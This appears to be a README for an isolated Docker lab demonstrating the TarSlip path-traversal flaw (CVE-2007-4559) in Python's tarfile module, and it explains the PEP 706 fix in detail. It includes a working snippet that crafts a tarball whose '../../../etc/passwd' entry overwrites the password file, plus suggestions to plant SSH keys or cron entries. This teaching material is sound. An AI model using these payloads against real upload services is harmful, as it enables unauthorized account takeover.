# CVE-2007-4559 (TarSlip): The 15-Year Directory Traversal

> **Educational use only.** This lab intentionally exploits file system vulnerabilities inside isolated Docker containers. Do not run on any system with sensitive data or in production environments.

A self-contained Docker lab that demonstrates **CVE-2007-4559**, the infamous "TarSlip" vulnerability in Python's `tarfile` module, through a concrete, end-to-end attack chain:

1. An attacker uploads a crafted tarball to a file upload API.
2. `extractall()` blindly writes a tar entry named `../../../etc/passwd` outside the extraction directory, overwriting the real system file.
3. The planted password grants the attacker access to a protected `/admin` endpoint.
4. The same attack is then run against a fixed API and blocked with one line of code.

---

## The vulnerability

Python's `tarfile.extractall()` faithfully reproduces every entry in a tar archive, including entries whose names contain `../` path traversal sequences. It was **never designed to be a security boundary**.

```
tar entry name : ../../../etc/passwd
extraction dir : /shared/uploads/a1b2c3d4/

resolved path  : /shared/uploads/a1b2c3d4/../../../etc/passwd
               = /etc/passwd   ← system file overwritten
```
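The resolution above can be reproduced with the standard library alone. This is a minimal sketch that uses `posixpath` so it behaves the same on any host. `resolve_entry` is a hypothetical helper name, not part of the lab's code, and `normpath` is purely lexical: it approximates what the operating system does when the joined path is opened.

```python
import posixpath

def resolve_entry(extraction_dir: str, entry_name: str) -> str:
    """Join an archive entry name onto the extraction dir and collapse '..' segments."""
    return posixpath.normpath(posixpath.join(extraction_dir, entry_name))

# Three '..' segments climb out of a1b2c3d4/, uploads/, and shared/ in turn.
resolved = resolve_entry("/shared/uploads/a1b2c3d4/", "../../../etc/passwd")
print(resolved)
```

The number of `../` segments needed depends only on how deep the extraction directory sits, which is why attackers often pad entry names with more segments than strictly necessary.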

| Year | Event |
|---|---|
| **2007** | Bug reported to the Python security team |
| **2007–2022** | Marked "not a security issue"; tarfile is "working as intended" |
| **2022** | Trellix researchers scan GitHub and find **350,000+ repos** calling `extractall()` on untrusted input |
| **2022** | Public disclosure. CVE-2007-4559 resurfaces. Industry-wide scramble. |
| **2023** | PEP 706 ships `filter='data'` in Python 3.12; the fix is a single argument |

---

## What the demo shows

The demo runs in three beats, each requiring a keypress to advance.

### Beat 1: Baseline

- `GET /admin` → **401**. The admin endpoint exists and is protected. The attacker does not know the password.
- Upload `innocent.tar.gz` → files land inside the sandbox directory. Everything looks normal.

### Beat 2: The Exploit

```
Attacker crafts tarslip_passwd.tar.gz
  └─ entry: "../../../etc/passwd"
       content: admin:hacked:1001:...   ← planted password
            │
            ▼
  POST /upload  (multipart file upload)
            │
            ▼
  extractall("/shared/uploads/{uuid}/")
  resolves "../../../etc/passwd" → /etc/passwd   ← CVE-2007-4559
            │
            ▼
  GET /admin   Authorization: Basic admin:hacked
            │
            ▼
  HTTP 200: "Welcome, admin! You have full admin access."
  flag: CVE-2007-4559{tarslip_passwd_overwrite_to_admin_rce}
```

One HTTP POST. No shell. No RCE payload. Just a tar file.

### Beat 3: The Fix

The same tarball is uploaded to the fixed API, which passes `filter='data'` to `extractall()`. Python raises `tarfile.OutsideDestinationError`: the traversal is blocked, `/etc/passwd` is untouched, and `/admin` stays locked.

```python
# Vulnerable: the default before Python 3.14
tar.extractall(extraction_dir)

# Fixed: PEP 706 (Python 3.12+)
tar.extractall(extraction_dir, filter='data')
```

One argument. Fifteen years to ship.

---

## Architecture

Four services on an isolated Docker bridge network (`tarslip-net`). Nothing reaches the internet.

```
┌─────────────────────────────────────────────────────────┐
│                   tarslip-net (bridge)                  │
│                                                         │
│  ┌─────────────────┐      ┌──────────────────────────┐  │
│  │  vulnerable-api │      │       file-server        │  │
│  │  python:3.11.3  │      │       nginx:alpine       │  │
│  │  port 8000      │      │       port 8080 (host)   │  │
│  │                 │      │                          │  │
│  │  POST /upload   │      │  Serves /shared over     │  │
│  │  GET  /admin    │      │  HTTP: browse extracts   │  │
│  │  GET  /health   │      │  visually                │  │
│  └────────┬────────┘      └────────────┬─────────────┘  │
│           │  shared-storage volume     │                │
│           └────────────────────────────┘                │
│                                                         │
│  ┌─────────────────┐                                    │
│  │    attacker     │                                    │
│  │  python:3.12    │  (no host port, internal only)     │
│  │                 │                                    │
│  │  craft_malicious.py  - generates tarballs            │
│  │  demo.py             - drives the demo               │
│  └─────────────────┘                                    │
└─────────────────────────────────────────────────────────┘
```

| Service | Image | Role | Host port |
|---|---|---|---|
| `vulnerable-api` | `python:3.11.3-slim` | Flask upload API + `/admin` guarded by `/etc/passwd` auth | 8000 |
| `fixed-api` | `python:3.12-slim` | Same code + `USE_SAFE_EXTRACTION=true` | 8000 |
| `file-server` | `nginx:alpine` | Directory listing of extracted files | 8080 |
| `attacker` | `python:3.12-slim` | Payload generator + demo driver | none |

The vulnerable and fixed APIs use **identical source code**. The only difference is the `USE_SAFE_EXTRACTION=true` environment variable on the fixed container, which flips the single `filter='data'` argument.
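A minimal sketch of how one environment variable could flip that argument. The lab's `app.py` is not reproduced here, so the helper names `extraction_kwargs` and `extract_upload` and the exact string comparison are assumptions; only the variable name `USE_SAFE_EXTRACTION` and the `filter='data'` argument come from this README.

```python
import os
import tarfile

def extraction_kwargs(env=None):
    """Return extra keyword arguments for extractall() based on the environment."""
    env = os.environ if env is None else env
    # Assumption: the flag is considered set only when it equals "true" (case-insensitive).
    safe = env.get("USE_SAFE_EXTRACTION", "").lower() == "true"
    return {"filter": "data"} if safe else {}

def extract_upload(archive_path, dest, env=None):
    """Extract an uploaded archive; the code path is identical in both containers."""
    with tarfile.open(archive_path) as tar:
        tar.extractall(dest, **extraction_kwargs(env))

print(extraction_kwargs({"USE_SAFE_EXTRACTION": "true"}))
print(extraction_kwargs({}))
```

Keeping the toggle in one small function makes the difference between the two containers easy to audit: everything else in the request path stays byte-for-byte the same.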

---

## Repository layout

```
CVE-2007-4559-lab/
├── run_demo.sh                      ← start here
├── docker-compose.vulnerable.yml
├── docker-compose.fixed.yml
├── vulnerable-api/
│   ├── app.py                       # Flask API: /upload + /admin + /health
│   ├── Dockerfile                   # seeds admin:s3cr3t_Adm1nPass into /etc/passwd
│   └── requirements.txt
├── file-server/
│   ├── Dockerfile
│   └── nginx.conf
└── attacker/
    ├── craft_malicious.py           # generates innocent.tar.gz + tarslip_passwd.tar.gz
    ├── demo.py                      # four-mode CLI driver (craft/baseline/exploit/verify)
    ├── Dockerfile
    └── requirements.txt
```

---

## Prerequisites

- **Docker** 20.10+ with the Compose plugin (`docker compose version`)
- **macOS / Linux**: the shell script uses `bash`
- Ports **8000** and **8080** free on your host

---

## Running the demo

```bash
git clone https://github.com/your-username/CVE-2007-4559-lab.git
cd CVE-2007-4559-lab
bash run_demo.sh
```

The script is fully interactive. It prints a narrative before each step and waits for **Enter** to advance. No prior Docker knowledge is needed to follow along.

### What each pause point covers

| Pause | Narrative shown | Action on Enter |
|---|---|---|
| 1 | CVE timeline, what the three beats are | Build vulnerable stack |
| 2 | Container roles, seeded admin password | Generate payloads |
| 3 | What's inside each tarball | Beat 1: baseline |
| 4 | Why `/admin` is 401, what normal extraction looks like | Beat 2: exploit |
| 5 | The exact traversal math, what gets overwritten | Swap to fixed stack |
| 6 | What `filter='data'` does and why it works | Beat 3: verify |
| 7 | Key takeaways + broader ZipSlip pattern | Teardown |

### Running beats individually

If you want to step through manually:

```bash
# Vulnerable stack
docker compose -f docker-compose.vulnerable.yml up --build -d
docker compose -f docker-compose.vulnerable.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py baseline
docker compose -f docker-compose.vulnerable.yml exec attacker python demo.py exploit

# Fixed stack
docker compose -f docker-compose.vulnerable.yml down
docker compose -f docker-compose.fixed.yml up --build -d
docker compose -f docker-compose.fixed.yml exec attacker python craft_malicious.py
docker compose -f docker-compose.fixed.yml exec attacker python demo.py verify

# Teardown
docker compose -f docker-compose.fixed.yml down
```

### Visual inspection

While the vulnerable stack is running, open [http://localhost:8080/uploads/](http://localhost:8080/uploads/) to browse the extracted session directories in your browser.

---

## How the `/admin` endpoint works

The API seeds a secret admin password into `/etc/passwd` at image build time:

```
admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash
```

`GET /admin` reads this file and checks the second field (password) against the HTTP Basic Auth credentials. The attacker doesn't know `s3cr3t_Adm1nPass`, but they don't need to: once TarSlip overwrites the file with their own version containing `admin:hacked`, the valid password is whatever they planted.

This is a simplified model of real-world targets: SSH `authorized_keys`, application config files, cron jobs, and any credential file the web process can write.
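The check described above can be sketched in a few lines. This is an illustration under assumptions, not the lab's `app.py`: the function names are hypothetical, and the `planted` line is a stand-in because the demo payload's remaining fields are elided in this README. Note that a real client sends the credentials base64-encoded, not as the literal `admin:hacked` shown in the Beat 2 diagram.

```python
import base64
import hmac

def password_for(user, passwd_text):
    """Return the second colon-separated field of the user's line, or None."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 2 and fields[0] == user:
            return fields[1]
    return None

def basic_header(user, password):
    """Build the Authorization header value a client would actually send."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"

def is_authorized(auth_header, passwd_text):
    """Compare Basic credentials against the password field in the passwd text."""
    scheme, _, token = auth_header.partition(" ")
    if scheme.lower() != "basic":
        return False
    try:
        user, _, password = base64.b64decode(token).decode().partition(":")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return False
    expected = password_for(user, passwd_text)
    return expected is not None and hmac.compare_digest(password.encode(), expected.encode())

seeded = "admin:s3cr3t_Adm1nPass:1001:1001:Administrator:/home/admin:/bin/bash\n"
planted = "admin:hacked:1001:1001:Administrator:/home/admin:/bin/bash\n"  # illustrative stand-in
attempt = basic_header("admin", "hacked")
print(is_authorized(attempt, seeded), is_authorized(attempt, planted))
```

The same request is rejected against the seeded file and accepted against the planted one, which is the whole attack: the credentials never change, only the file they are checked against.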

---

## How the payloads are crafted

`craft_malicious.py` uses Python's own `tarfile` module, the same one that has the bug:

```python
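import io
import tarfile

def _add_entry(tar, name, content):
    info = tarfile.TarInfo(name=name)   # name is the traversal path
    info.size = len(content)            # must equal the payload length in bytes
    tar.addfile(info, io.BytesIO(content))

malicious_passwd_content = b"admin:hacked:1001:...\n"   # planted credentials (elided)

# Entry name resolves to /etc/passwd when extracted into /shared/uploads/{uuid}/
with tarfile.open("tarslip_passwd.tar.gz", "w:gz") as tar:
    _add_entry(tar, "../../../etc/passwd", malicious_passwd_content)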
```

No special tools. No binary exploitation. The standard library is both the weapon and the victim.
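To see that `tarfile` stores the entry name verbatim, the archive can be built and read back entirely in memory. This is a small sketch with hypothetical helper names (`build_archive`, `list_entry_names`) and placeholder content; nothing is extracted or written to disk.

```python
import io
import tarfile

def build_archive(entries):
    """Pack a {name: bytes} mapping into a gzip-compressed tar held in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for name, content in entries.items():
            info = tarfile.TarInfo(name=name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return buf.getvalue()

def list_entry_names(archive_bytes):
    """Read the archive back and return member names without extracting anything."""
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tar:
        return tar.getnames()

archive = build_archive({"../../../etc/passwd": b"placeholder\n"})
print(list_entry_names(archive))
```

Listing names this way is also a cheap first triage step for a suspicious upload, since it never touches the file system.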

---

## The fix explained

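PEP 706 added the `filter=` argument to `extractall()` and `extract()`. It shipped in Python 3.12 and was backported as a security fix to 3.8.17, 3.9.17, 3.10.12, and 3.11.4. The `'data'` filter:

- Rejects entries that resolve outside the destination directory
- Strips setuid/setgid bits
- Refuses device files, and refuses links (hard or symbolic) that point to absolute paths or outside the destination
- Raises `tarfile.OutsideDestinationError` on traversal attempts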

```python
# Before (vulnerable; still the default until Python 3.14)
with tarfile.open(path) as tar:
    tar.extractall(dest)

# After (safe)
with tarfile.open(path) as tar:
    tar.extractall(dest, filter='data')
```
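The blocking behavior can be checked without touching any system file. The sketch below builds a harmless traversal archive in memory (entry name `../escape.txt`, chosen for illustration) and extracts it into a temporary directory. The helper names are hypothetical, and the `hasattr` guard is there because interpreters without the PEP 706 backport do not accept `filter=` at all.

```python
import io
import tarfile
import tempfile

def build_traversal_archive():
    """Create an in-memory tar whose single entry tries to escape the destination."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        payload = b"should never be written\n"
        info = tarfile.TarInfo(name="../escape.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

def try_safe_extract(archive_bytes, dest):
    """Extract with the 'data' filter and report what happened."""
    if not hasattr(tarfile, "data_filter"):
        return "unsupported"  # no extraction is attempted on interpreters without filters
    with tarfile.open(fileobj=io.BytesIO(archive_bytes)) as tar:
        try:
            tar.extractall(dest, filter="data")
        except tarfile.OutsideDestinationError:
            return "blocked"
    return "extracted"

with tempfile.TemporaryDirectory() as sandbox:
    outcome = try_safe_extract(build_traversal_archive(), sandbox)
print(outcome)
```

On an interpreter with extraction filters this should report `blocked`; the exception is raised before any bytes are written, so the parent of the temporary directory stays untouched.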

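For interpreters that predate the `filter` argument (for example the `python:3.11.3` image used here, or any build where `hasattr(tarfile, 'data_filter')` is false), validate manually. The sketch below is deliberately conservative and rejects links outright, because a name check alone does not cover link targets:

```python
import os

def safe_extract(tar, dest):
    dest = os.path.realpath(dest)
    for member in tar.getmembers():
        # Links can redirect later writes; the name check below never sees their targets
        if member.issym() or member.islnk():
            raise ValueError(f"Link not allowed: {member.name}")
        member_path = os.path.realpath(os.path.join(dest, member.name))
        # commonpath() compares whole components and accepts dest itself (e.g. a "./" entry)
        if os.path.commonpath([dest, member_path]) != dest:
            raise ValueError(f"Unsafe path: {member.name}")
    tar.extractall(dest)
```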

Static analysis: `bandit` rule **B202** flags unsafe `extractall()` calls in CI.

---

## Broader impact: ZipSlip

TarSlip is the tar-specific name for a class of vulnerability that shows up across languages and libraries with archive extraction APIs:

| Language | Vulnerable API | CVE / Advisory |
|---|---|---|
| Python | `tarfile.extractall()` | CVE-2007-4559 |
| Java | `ZipInputStream` | ZipSlip (2018) |
| Go | `archive/zip` | ZipSlip (2018) |
| .NET | `ZipArchive` | ZipSlip (2018) |
| Node.js | `tar`, `adm-zip`, others | ZipSlip (2018) |

Same root cause everywhere: trusting paths from untrusted archives. Same fix everywhere: canonicalize and validate before writing.

---

## Audience variations

### Developer audiences
Focus on the before/after code diff and the `bandit` B202 rule. The goal is answering "how do we prevent this in our codebase?", so show the PEP 706 migration guide and how to add the check to CI.

### Security audiences
Focus on the Trellix disclosure methodology: how they searched GitHub at scale, estimated impact across 350,000 repos, and navigated responsible disclosure for a vulnerability this widespread.

### CTF audiences
Extend `craft_malicious.py` to plant an SSH `authorized_keys` file or a malicious cron entry instead of `/etc/passwd`. Same technique, different targets: it shows that any writable path is an attack surface.

---

## References

- [NVD: CVE-2007-4559](https://nvd.nist.gov/vuln/detail/CVE-2007-4559)
- [PEP 706: Filter for tarfile.extractall](https://peps.python.org/pep-0706/)
- [Trellix: "15 Years Later: On the Dangers of Zip/Tar Slip"](https://www.trellix.com/en-us/about/newsroom/stories/research/tarslip.html)
- [Python issue tracker: bpo-21109](https://bugs.python.org/issue21109) (tracker issue for the `tarfile` traversal attack)
- [Bandit B202](https://bandit.readthedocs.io/en/latest/plugins/b202_tarfile_unsafe_members.html)
- [Snyk ZipSlip advisory](https://security.snyk.io/research/zip-slip-vulnerability)

---

## License

MIT. Use freely for education, security research, and conference demos. Do not use the payload generation techniques against systems you do not own.